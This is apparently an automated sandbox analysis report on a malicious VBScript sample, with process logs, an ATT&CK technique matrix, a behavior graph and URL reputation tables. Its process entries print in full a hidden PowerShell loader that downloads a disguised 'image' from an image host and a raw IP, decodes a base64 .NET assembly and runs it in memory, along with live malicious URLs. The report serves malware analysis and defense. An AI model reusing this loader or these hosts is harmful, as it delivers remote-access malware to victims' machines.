Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtrededgtrelwdgtre5dgtredudgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtrededgtrendgtredgtrezdgtredydgtrenwdgtrezdgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtregidgtreawbwdgtrededgtrexwb2dgtregidgtrecwdgtreudgtregodgtrecdgtrebndgtreccdgtrekqdgtre7dgtrecdgtredgtrejdgtrebpdgtreg0dgtreyqbndgtregudgtreqgb5dgtrehqdgtrezqbzdgtrecdgtredgtrepqdgtregdgtreeqdgtrebwb3dg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.cnvh/kj/moc.srednowsredniw//:sptth' , '1' , 'c:\programdata\' , 'name'))} }
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtrededgtrelwdgtre5dgtredudgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtrededgtrendgtredgtrezdgtredydgtrenwdgtrezdgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtregidgtreawbwdgtrededgtrexwb2dgtregidgtrecwdgtreudgtregodgtrecdgtrebndgtreccdgtrekqdgtre7dgtrecdgtredgtrejdgtrebpdgtreg0dgtreyqbndgtregudgtreqgb5dgtrehqdgtrezqbzdgtrecdgtredgtrepqdgtregdgtreeqdgtrebwb3dgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.cnvh/kj/moc.srednowsredniw//:sptth' , '1' , 'c:\programdata\' , 'name'))} }Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information121
Scripting
Valid Accounts11
Command and Scripting Interpreter
121
Scripting
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
11
Registry Run Keys / Startup Folder
11
Registry Run Keys / Startup Folder
11
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
1
Obfuscated Files or Information
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1391738 Sample: dereac.vbe Startdate: 13/02/2024 Architecture: WINDOWS Score: 100 31 paste.ee 2->31 33 winderswonders.com 2->33 35 uploaddeimagens.com.br 2->35 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 53 7 other signatures 2->53 10 wscript.exe 1 2->10         started        14 wscript.exe 2->14         started        16 wscript.exe 2->16         started        signatures3 51 Connects to a pastebin service (likely for C&C) 31->51 process4 dnsIp5 39 paste.ee 104.21.84.67, 443, 49699, 49700 CLOUDFLARENETUS United States 10->39 59 Suspicious powershell command line found 10->59 61 Wscript starts Powershell (via cmd or directly) 10->61 63 Very long command line found 10->63 67 2 other signatures 10->67 18 powershell.exe 7 10->18         started        65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->65 signatures6 process7 signatures8 41 Suspicious powershell command line found 18->41 43 Found suspicious powershell code related to unpacking or dynamic code loading 18->43 21 powershell.exe 15 15 18->21         started        25 conhost.exe 18->25         started        process9 dnsIp10 37 uploaddeimagens.com.br 172.67.215.45, 443, 49701 CLOUDFLARENETUS United States 21->37 55 Suspicious powershell command line found 21->55 57 Creates autostart registry keys with suspicious values (likely registry only malware) 21->57 27 powershell.exe 12 21->27         started        signatures11 process12 process13 29 conhost.exe 27->29         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://schemas.mi0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
https://www.google.com;0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
https://analytics.paste.ee;0%Avira URL Cloudsafe
https://uploaddeimagens.com.br0%Avira URL Cloudsafe
https://winderswonders.com/JK/hvnc.txt100%Avira URL Cloudmalware
https://winderswonders.com100%Avira URL Cloudmalware
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673100%Avira URL Cloudmalware
https://go.microsoft.co0%Avira URL Cloudsafe
http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
paste.ee
104.21.84.67
truefalse
    high
    uploaddeimagens.com.br
    172.67.215.45
    truetrue
      unknown
      winderswonders.com
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://paste.ee/d/JZHbWfalse
          high
          https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673true
          • Avira URL Cloud: malware
          unknown
          https://paste.ee/d/JZHbWfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://45.74.19.84/xampp/bkp/bkp1_vbs.jpgpowershell.exe, 00000004.00000002.2320092493.000001EA52349000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://schemas.miwscript.exe, 00000008.00000003.2287778815.000001D622B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
